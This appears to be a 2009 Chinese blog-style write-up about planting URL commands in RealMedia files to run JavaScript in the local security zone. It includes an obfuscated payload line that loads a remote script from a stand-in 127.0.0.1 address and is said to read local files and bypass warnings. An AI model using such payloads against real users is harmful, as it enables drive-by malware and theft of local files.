当前位置: 首页 > 图文教程 > 网络安全 > 黑客技术 > rm格式插入广告代码

黑客技术
密码破解以及抗击手段(1)
密码破解以及抗击手段(2)
密码破解以及抗击手段(3)
密码破解以及抗击手段(4)
加密解密大比拼(1)
加密解密大比拼(2)
加密解密大比拼(3)
加密解密大比拼(4)
加密解密大比拼(5)
加密解密大比拼(6)
加密解密大比拼(7)
密码与Crack工具研究(1)
密码与Crack工具研究(2)
密码与Crack工具研究(3)
密码与Crack工具研究(4)
软件狗[Dongles]的加密与解密技术(1)
软件狗[Dongles]的加密与解密技术(2)
软件狗[Dongles]的加密与解密技术(3)
软件狗[Dongles]的加密与解密技术(4)
软件狗[Dongles]的加密与解密技术(5)

黑客技术 中的 rm格式插入广告代码


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-09-13   浏览: 98 ::
收藏到网摘: n/a

很久以前就有这个东西,当时都是用来挂马的,不过忽然想起来,如果能跳到javascript:这样的格式在本地执行js代码意义还是有点的吧,于是测试了下.结果很让人沮丧,realplay对这个好象倒是有限制,而且查看被插入的rm文件里看出应该是本身就做了限制,看来支持的协议不多啊....于是试试file:///,结果发现是支持的,于是想到前段时间的html injection,如果加起来应该有点效果.
复制代码 代码如下:

u 00:00:02 00:00:05 file://C:\WINDOWS\Help\iisHelp\common\400.htm#javascript:document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,49,50,55,46,48,46,48,46,49,47,116,101,115,116,46,106,115,62,60,47,115,99,114,105,112,116,62))/


这段代码插进去会出现一个诡异的连接,点击下会执行我指定的js(微软的工程师还是很小心的,暂时正常情况下找到的html就这一个,而且还要点......),而且事实证明的确是本地域执行的,可以读本地的文件,呵呵......而且在realone播放的情况下,ie那个本地执行js代码的警告居然会神奇地消失,于是放到html页面播放,果然很郁闷,打开任何html都会警告,不过还是神奇地能打开本地域的文件.....正常下用window.open是不可以的.....域的限制是可以突破,希望能找到个本地存在问题的html就OK啦,呵呵.......
真希望这些边缘的地方能出点问题,我感觉还是可能的 :)